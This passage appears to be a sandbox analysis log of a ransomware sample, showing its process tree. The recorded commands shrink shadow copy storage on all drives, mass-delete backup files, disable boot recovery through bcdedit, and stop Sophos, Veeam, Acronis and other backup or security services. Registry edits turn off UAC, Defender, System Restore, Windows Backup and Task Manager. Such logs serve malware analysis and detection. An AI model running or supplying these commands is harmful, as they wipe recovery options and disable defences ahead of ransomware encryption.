        [5] C:\Windows\system32\vssadmin.exe
            command line: vssadmin resize shadowstorage /for=J:\ /on=J:\ /maxsize=401MB
            - Enumerates connected drives
            - Interacts with shadow copies
            PID: 3700
    [3] C:\Windows\system32\cmd.exe
        command line: C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=K:\ /on=K:\ /maxsize=401MB
        PID: 3640
      [4] C:\Windows\System32\cmd.exe
          command line: C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=K:\ /on=K:\ /maxsize=401MB
          PID: 2228
        [5] C:\Windows\system32\vssadmin.exe
            command line: vssadmin resize shadowstorage /for=K:\ /on=K:\ /maxsize=401MB
            - Enumerates connected drives
            - Interacts with shadow copies
            PID: 4152
    [3] C:\Windows\system32\cmd.exe
        command line: C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=M:\ /on=M:\ /maxsize=401MB
        PID: 1472
      [4] C:\Windows\System32\cmd.exe
          command line: C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=M:\ /on=M:\ /maxsize=401MB
          PID: 1068
        [5] C:\Windows\system32\vssadmin.exe
            command line: vssadmin resize shadowstorage /for=M:\ /on=M:\ /maxsize=401MB
            - Enumerates connected drives
            - Interacts with shadow copies
            PID: 1188
    [3] C:\Windows\system32\cmd.exe
        command line: C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=N:\ /on=N:\ /maxsize=401MB
        PID: 2772
      [4] C:\Windows\System32\cmd.exe
          command line: C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=N:\ /on=N:\ /maxsize=401MB
          PID: 1964
        [5] C:\Windows\system32\vssadmin.exe
            command line: vssadmin resize shadowstorage /for=N:\ /on=N:\ /maxsize=401MB
            - Enumerates connected drives
            - Interacts with shadow copies
            PID: 508
    [3] C:\Windows\system32\cmd.exe
        command line: C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=O:\ /on=O:\ /maxsize=401MB
        PID: 2784
      [4] C:\Windows\System32\cmd.exe
          command line: C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=O:\ /on=O:\ /maxsize=401MB
          PID: 2488
    [3] C:\Windows\system32\cmd.exe
        command line: C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=L:\ /on=L:\ /maxsize=401MB
        PID: 2600
      [4] C:\Windows\System32\cmd.exe
          command line: C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=L:\ /on=L:\ /maxsize=401MB
          PID: 1380
        [5] C:\Windows\system32\vssadmin.exe
            command line: vssadmin resize shadowstorage /for=L:\ /on=L:\ /maxsize=401MB
            - Enumerates connected drives
            - Interacts with shadow copies
            PID: 1184
    [3] C:\Windows\system32\cmd.exe
        command line: C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=Q:\ /on=Q:\ /maxsize=401MB
        PID: 1336
      [4] C:\Windows\System32\cmd.exe
          command line: C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=Q:\ /on=Q:\ /maxsize=401MB
          PID: 4016
        [5] C:\Windows\system32\vssadmin.exe
            command line: vssadmin resize shadowstorage /for=Q:\ /on=Q:\ /maxsize=401MB
            - Enumerates connected drives
            - Interacts with shadow copies
            PID: 3916
    [3] C:\Windows\system32\cmd.exe
        command line: C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=R:\ /on=R:\ /maxsize=401MB
        PID: 1320
      [4] C:\Windows\System32\cmd.exe
          command line: C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=R:\ /on=R:\ /maxsize=401MB
          PID: 1780
        [5] C:\Windows\system32\vssadmin.exe
            command line: vssadmin resize shadowstorage /for=R:\ /on=R:\ /maxsize=401MB
            - Enumerates connected drives
            - Interacts with shadow copies
            PID: 4032
    [3] C:\Windows\system32\cmd.exe
        command line: C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=S:\ /on=S:\ /maxsize=401MB
        PID: 1616
      [4] C:\Windows\System32\cmd.exe
          command line: C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=S:\ /on=S:\ /maxsize=401MB
          PID: 1372
        [5] C:\Windows\system32\vssadmin.exe
            command line: vssadmin resize shadowstorage /for=S:\ /on=S:\ /maxsize=401MB
            - Enumerates connected drives
            - Interacts with shadow copies
            PID: 3772
    [3] C:\Windows\system32\cmd.exe
        command line: C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=P:\ /on=P:\ /maxsize=401MB
        PID: 664
      [4] C:\Windows\System32\cmd.exe
          command line: C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=P:\ /on=P:\ /maxsize=401MB
          PID: 2684
        [5] C:\Windows\system32\vssadmin.exe
            command line: vssadmin resize shadowstorage /for=P:\ /on=P:\ /maxsize=401MB
            - Enumerates connected drives
- Interacts with shadow copies
PID:4256
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=U:\ /on=U:\ /maxsize=401MB3⤵PID:1176
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=U:\ /on=U:\ /maxsize=401MB4⤵PID:1220
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=U:\ /on=U:\ /maxsize=401MB5⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:4288
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=V:\ /on=V:\ /maxsize=401MB3⤵PID:592
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=V:\ /on=V:\ /maxsize=401MB4⤵PID:1368
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=V:\ /on=V:\ /maxsize=401MB5⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:4200
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=W:\ /on=W:\ /maxsize=401MB3⤵PID:1264
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=W:\ /on=W:\ /maxsize=401MB4⤵PID:2696
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=X:\ /on=X:\ /maxsize=401MB3⤵PID:2568
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=X:\ /on=X:\ /maxsize=401MB4⤵PID:2256
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=X:\ /on=X:\ /maxsize=401MB5⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:4192
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=Y:\ /on=Y:\ /maxsize=401MB3⤵PID:2392
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=Y:\ /on=Y:\ /maxsize=401MB4⤵PID:4052
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=Y:\ /on=Y:\ /maxsize=401MB5⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:4080
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=T:\ /on=T:\ /maxsize=401MB3⤵PID:2552
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=T:\ /on=T:\ /maxsize=401MB4⤵PID:2080
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=T:\ /on=T:\ /maxsize=401MB5⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:4132
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB3⤵PID:1252
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB4⤵PID:4020
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB5⤵
- Interacts with shadow copies
PID:2224
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=A:\ /on=A:\ /maxsize=401MB3⤵PID:3028
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=A:\ /on=A:\ /maxsize=401MB4⤵PID:1932
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=A:\ /on=A:\ /maxsize=401MB5⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:1340
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=Z:\ /on=Z:\ /maxsize=401MB3⤵PID:1136
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=Z:\ /on=Z:\ /maxsize=401MB4⤵PID:2180
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=Z:\ /on=Z:\ /maxsize=401MB5⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:2156
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=B:\ /on=B:\ /maxsize=401MB3⤵PID:4004
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=B:\ /on=B:\ /maxsize=401MB4⤵PID:2332
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=B:\ /on=B:\ /maxsize=401MB5⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:4308
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop " Enterprise Client Service"3⤵PID:4176
-
C:\Windows\system32\net.exenet stop " Enterprise Client Service"4⤵PID:4428
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop " Enterprise Client Service"5⤵PID:4500
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "Sophos Agent"3⤵PID:4756
-
C:\Windows\system32\net.exenet stop "Sophos Agent"4⤵PID:4768
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sophos Agent"5⤵PID:4780
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "Sophos AutoUpdate Service"3⤵PID:4808
-
C:\Windows\system32\net.exenet stop "Sophos AutoUpdate Service"4⤵PID:4820
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sophos AutoUpdate Service"5⤵PID:4832
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "Sophos Clean Service"3⤵PID:4864
-
C:\Windows\system32\net.exenet stop "Sophos Clean Service"4⤵PID:4876
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sophos Clean Service"5⤵PID:4888
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /s /f /q L:\*.bac L:\*.bak L:\Backup*.* L:\backup*.*3⤵PID:4912
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /s /f /q J:\*.bac J:\*.bak J:\Backup*.* J:\backup*.*3⤵PID:4928
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /s /f /q Z:\*.bac Z:\*.bak Z:\Backup*.* Z:\backup*.*3⤵PID:4948
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "Sophos Device Control Service"3⤵PID:4940
-
C:\Windows\system32\net.exenet stop "Sophos Device Control Service"4⤵PID:5000
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sophos Device Control Service"5⤵PID:5016
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /s /f /q M:\*.bac M:\*.bak M:\Backup*.* M:\backup*.*3⤵PID:4964
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /s /f /q Q:\*.bac Q:\*.bak Q:\Backup*.* Q:\backup*.*3⤵PID:4976
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /s /f /q H:\*.bac H:\*.bak H:\Backup*.* H:\backup*.*3⤵PID:4988
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /s /f /q A:\*.bac A:\*.bak A:\Backup*.* A:\backup*.*3⤵PID:5028
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /s /f /q I:\*.bac I:\*.bak I:\Backup*.* I:\backup*.*3⤵PID:5052
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /s /f /q D:\*.bac D:\*.bak D:\Backup*.* D:\backup*.*3⤵PID:5064
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /s /f /q E:\*.bac E:\*.bak E:\Backup*.* E:\backup*.*3⤵PID:5088
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /s /f /q Y:\*.bac Y:\*.bak Y:\Backup*.* Y:\backup*.*3⤵PID:5080
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c bcdedit /set {default} recoveryenabled No3⤵PID:5112
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c bcdedit /set {default} recoveryenabled No4⤵PID:4460
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No5⤵
- Modifies boot configuration data using bcdedit
PID:4776
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /s /f /q S:\*.bac S:\*.bak S:\Backup*.* S:\backup*.*3⤵PID:2084
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /s /f /q G:\*.bac G:\*.bak G:\Backup*.* G:\backup*.*3⤵PID:4000
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /s /f /q P:\*.bac P:\*.bak P:\Backup*.* P:\backup*.*3⤵PID:772
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /s /f /q C:\*.bac C:\*.bak C:\Backup*.* C:\backup*.*3⤵PID:4504
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /s /f /q W:\*.bac W:\*.bak W:\Backup*.* W:\backup*.*3⤵PID:816
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /s /f /q K:\*.bac K:\*.bak K:\Backup*.* K:\backup*.*3⤵PID:5104
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /s /f /q X:\*.bac X:\*.bak X:\Backup*.* X:\backup*.*3⤵PID:4264
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /s /f /q B:\*.bac B:\*.bak B:\Backup*.* B:\backup*.*3⤵PID:4580
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /s /f /q F:\*.bac F:\*.bak F:\Backup*.* F:\backup*.*3⤵PID:4784
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /s /f /q R:\*.bac R:\*.bak R:\Backup*.* R:\backup*.*3⤵PID:4772
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /s /f /q V:\*.bac V:\*.bak V:\Backup*.* V:\backup*.*3⤵PID:4804
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /s /f /q N:\*.bac N:\*.bak N:\Backup*.* N:\backup*.*3⤵PID:4836
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /s /f /q U:\*.bac U:\*.bak U:\Backup*.* U:\backup*.*3⤵PID:4840
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵PID:4848
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures4⤵PID:504
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures5⤵
- Modifies boot configuration data using bcdedit
PID:1036
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /s /f /q T:\*.bac T:\*.bak T:\Backup*.* T:\backup*.*3⤵PID:2116
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "Sophos File Scanner Service"3⤵PID:4808
-
C:\Windows\system32\net.exenet stop "Sophos File Scanner Service"4⤵PID:1736
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sophos File Scanner Service"5⤵PID:1844
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f3⤵PID:388
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f4⤵
- UAC bypass
PID:1224
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "Sophos Health Service"3⤵PID:2020
-
C:\Windows\system32\net.exenet stop "Sophos Health Service"4⤵PID:4904
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sophos Health Service"5⤵PID:4892
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f3⤵PID:3496
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f4⤵PID:260
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "Sophos MCS Agent"3⤵PID:4880
-
C:\Windows\system32\net.exenet stop "Sophos MCS Agent"4⤵PID:3916
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sophos MCS Agent"5⤵PID:3344
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f3⤵PID:276
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f4⤵PID:4876
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f3⤵PID:4216
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f4⤵PID:4128
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "Sophos MCS Client"3⤵PID:4912
-
C:\Windows\system32\net.exenet stop "Sophos MCS Client"4⤵PID:4936
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sophos MCS Client"5⤵PID:4868
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\System /v AllowBlockingAppsAtShutdown /t REG_DWORD /d 1 /f3⤵PID:3904
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\System /v AllowBlockingAppsAtShutdown /t REG_DWORD /d 1 /f4⤵PID:4240
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v StartMenuLogOff /t REG_DWORD /d 1 /f3⤵PID:2984
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v StartMenuLogOff /t REG_DWORD /d 1 /f4⤵PID:4232
-
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MBEndpointAgent"4⤵PID:3088
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "Sophos Message Router"3⤵PID:3324
-
C:\Windows\system32\net.exenet stop "Sophos Message Router"4⤵PID:1068
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sophos Message Router"5⤵PID:1472
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f3⤵PID:1336
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f4⤵PID:1152
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "Sophos Safestore Service"3⤵PID:636
-
C:\Windows\system32\net.exenet stop "Sophos Safestore Service"4⤵PID:2716
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sophos Safestore Service"5⤵PID:4164
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableChangePassword /t REG_DWORD /d 1 /f3⤵PID:2928
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableChangePassword /t REG_DWORD /d 1 /f4⤵PID:4352
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "Sophos System Protection Service"3⤵PID:1932
-
C:\Windows\system32\net.exenet stop "Sophos System Protection Service"4⤵PID:4040
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sophos System Protection Service"5⤵PID:4336
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f3⤵PID:748
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f4⤵PID:4140
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoLogoff /t REG_DWORD /d 1 /f3⤵PID:3444
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoLogoff /t REG_DWORD /d 1 /f4⤵PID:4964
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "Sophos Web Control Service"3⤵PID:4464
-
C:\Windows\system32\net.exenet stop "Sophos Web Control Service"4⤵PID:3028
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sophos Web Control Service"5⤵PID:4120
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum /v {645FF040-5081-101B-9F08-00AA002F954E} /t REG_DWORD /d 1 /f3⤵PID:4156
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum /v {645FF040-5081-101B-9F08-00AA002F954E} /t REG_DWORD /d 1 /f4⤵PID:4188
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SQLsafe Backup Service"3⤵PID:2456
-
C:\Windows\system32\net.exenet stop "SQLsafe Backup Service"4⤵PID:4976
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLsafe Backup Service"5⤵PID:5048
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WinRE /v DisableSetup /t REG_DWORD /d 1 /f3⤵PID:3380
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WinRE /v DisableSetup /t REG_DWORD /d 1 /f4⤵PID:3792
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableConfig /t REG_DWORD /d 1 /f3⤵PID:2124
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableConfig /t REG_DWORD /d 1 /f4⤵PID:4448
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SQLsafe Filter Service"3⤵PID:4052
-
C:\Windows\system32\net.exenet stop "SQLsafe Filter Service"4⤵PID:3648
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLsafe Filter Service"5⤵PID:608
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableSR /t REG_DWORD /d 1 /f3⤵PID:3768
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableSR /t REG_DWORD /d 1 /f4⤵PID:3144
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "Symantec System Recovery"3⤵PID:1796
-
C:\Windows\system32\net.exenet stop "Symantec System Recovery"4⤵PID:5072
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Symantec System Recovery"5⤵PID:1936
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToDisk /t REG_DWORD /d 1 /f3⤵PID:3760
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToDisk /t REG_DWORD /d 1 /f4⤵PID:3484
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToNetwork /t REG_DWORD /d 1 /f3⤵PID:3624
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToNetwork /t REG_DWORD /d 1 /f4⤵PID:356
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "Veeam Backup Catalog Data Service"3⤵PID:2108
-
C:\Windows\system32\net.exenet stop "Veeam Backup Catalog Data Service"4⤵PID:492
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Veeam Backup Catalog Data Service"5⤵PID:4400
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToOptical /t REG_DWORD /d 1 /f3⤵PID:3836
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToOptical /t REG_DWORD /d 1 /f4⤵PID:4072
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "AcronisAgent"3⤵PID:1528
-
C:\Windows\system32\net.exenet stop "AcronisAgent"4⤵PID:2360
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "AcronisAgent"5⤵PID:4020
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupLauncher /t REG_DWORD /d 1 /f3⤵PID:2684
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupLauncher /t REG_DWORD /d 1 /f4⤵PID:1480
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableRestoreUI /t REG_DWORD /d 1 /f3⤵PID:4536
-
